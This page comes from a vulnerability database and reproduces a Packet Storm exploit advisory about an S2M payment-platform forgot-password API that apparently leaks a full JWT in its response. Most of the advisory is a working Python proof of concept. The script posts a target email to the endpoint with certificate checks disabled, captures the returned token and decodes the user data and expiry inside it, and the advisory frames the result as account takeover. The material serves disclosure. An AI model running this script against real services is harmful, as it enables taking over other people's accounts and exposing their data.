Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 S2M Forgot Password Endpoint Token Exposure

🗓️ 11 May 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 40 Views

S2M forgot-password API exposes full JWT in response; a Python script retrieves and decodes it.

Code
==================================================================================================================================
    | # Title     : S2M JWT Token Exposure API Forgot Password Endpoint Vulnerability                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://s2mworldwide.com/en/                                                                                     |
    ==================================================================================================================================
    
    [+] Summary    : This Python script demonstrates a security assessment targeting a forgot-password API endpoint in a digital payment platform operated by S2M, 
                     a company specializing in secure electronic transactions and payment processing solutions.
                     The script sends a crafted POST request using a known email address and attempts to retrieve a JWT (JSON Web Token) directly from the server response without proper verification.
    
    [+] If successful, the script:
    
    Extracts and displays the full JWT token
    Decodes the token payload (base64)
    Parses and prints sensitive information, including:
    User-related data
    Account status (userStatus)
    Token expiration time (exp)
    
    [+] Security Impact:
    This behavior indicates a critical vulnerability in the authentication flow. If an attacker can obtain valid JWT tokens without proper identity verification, it may lead to:
    
    [+] Account Takeover 
    Sensitive Information Disclosure
    Weak Password Reset Mechanism
    
    [+] POC   :  
    
    
    import requests
    import urllib3
    import json
    import base64
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    BASE_URL = "https://127.0.0.1/path/api/merchant/auth"
    EMAIL = "[email protected]"
    
    def decode_jwt_payload(token):
    
    "Decode the middle part of the JWT to display the data"
    
    try:
    
    parts = token.split('.')
    
    if len(parts) != 3:
    
    return "Invalid token format"
    
    payload = parts[1]
    
    payload += '=' * (-len(payload) % 4)
    
    decoded = base64.b64decode(payload).decode('utf-8')
    
    return json.loads(decoded)
    
    except Exception as e:
    
    return f"Token content extraction failed: {e}"
    
    def get_full_token():
    
    session = requests.Session()
    
    session.headers.update({
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    
    "Content-Type": "application/json"
    
    })
    
    try:
    
    print(f"[*] Extracting full account token: {EMAIL}")
    
    res = session.post(f"{BASE_URL}/forgot-password", json={"email": EMAIL}, verify=False)
    
    data = res.json()
    
    token = data.get('token')
    
    status = data.get('userStatus')
    
    if token:
    
    print("\n" + "="*30 + " Full token (JWT) " + "="*30)
    
    print(token)
    
    print("="*81 + "\n")
    
    
    print("[*] Token Content Parsing (Decoded Payload):")
    
    payload_info = decode_jwt_payload(token)
    
    print(json.dumps(payload_info, indent=4, ensure_ascii=False))
    
    
    print(f"\n[!] Current User Status: {status}")
    
    
    if 'exp' in payload_info:
    
    from datetime import datetime
    
    exp_date = datetime.fromtimestamp(payload_info['exp'])
    
    print(f"[!] Token valid until: {exp_date}")
    
    else:
    
    print("[-] No token found in server response.")
    
    print(f"[*] Full response: {data}")
    
    except Exception as e:
    
    print(f"[X] Error: {e}")
    
    if __name__ == "__main__": 
    get_full_token()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
forgot password endpointjson web tokentoken exposuresecurity assessmentsensitive dataaccount takeovers2m platform
40